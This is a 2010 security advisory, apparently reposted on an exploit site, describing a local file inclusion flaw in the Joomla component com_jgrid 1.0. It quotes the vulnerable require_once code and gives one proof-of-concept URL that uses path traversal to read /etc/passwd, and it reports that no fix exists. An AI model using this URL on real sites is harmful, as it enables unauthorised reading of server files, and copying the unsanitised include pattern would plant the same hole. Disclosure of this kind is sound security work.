Home / exploitsPDF  

Joomla Component com_jgrid 1.0 Local File Inclusion Vulnerab

Posted on 16 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_jgrid 1.0 Local File Inclusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================
Joomla Component com_jgrid 1.0 Local File Inclusion Vulnerability
=================================================================

Name              Jgrid
 Vendor            http://datagrids.clubsareus.org
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-14
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
DATA GRID Component built on the popular EXTJS Framework.
 
 
II. DESCRIPTION
_______________
 
A parameter is not properly sanitised before being  used
by the require_once function.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Local File Inclusion
  
 
A) Local File Inclusion
_______________________
 
The  controller  parameter in jgrid.php is not  sanitised
before  being  used by the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:
 
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
 
 
IV. SAMPLE CODE
_______________
 
A) Local File Inclusion
 
http://site/path/index.php?option=com_jgrid&amp;controller=../../../../../../../../etc/passwd%00
 
 
V. FIX
______
 
No fix.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :